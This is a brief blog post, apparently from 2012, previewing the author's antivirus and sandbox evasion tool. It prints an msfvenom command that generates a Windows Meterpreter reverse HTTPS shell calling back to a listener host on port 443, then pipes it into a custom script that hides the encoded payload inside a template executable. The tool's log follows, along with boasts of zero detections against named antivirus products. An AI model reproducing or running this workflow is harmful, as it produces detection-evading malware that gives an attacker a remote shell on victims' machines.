Antivirus Sandbox Evasion (part1) – Preview
Hmmm, it seems that I wrote something very nice...
$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \
    | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe
[*ultimate] Waiting for payload from STDIN
[*ultimate] Payload: read (size: 367)
[*ultimate] Payload: encode (new size: 1161)
[*ultimate] Template: read 94720 bytes from file
[*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928
[*ultimate] Output: add the begin of the template (size: 36928)
[*ultimate] Output: add the encoded payload (size: 1161)
[*ultimate] Output: add the end of the template (size: 18502)
[*ultimate] File '/tmp/payload.exe' generated (size: 94720)
WTF is that? "That" is my new toy: an antivirus evasion tool which bypasses signature, heuristic and... sandbox detections ;-)
Tested on VirusTotal.com (zero detections out of 44), then on virtual machines against:
- MS Security Essentials
- ESET Nod32
- Symantec (of course)
So far so good. Let me play a bit with it. As soon as I find another (private) method, I swear to release this one...
Stay tuned ;-)
© 2012, foip. All rights reserved.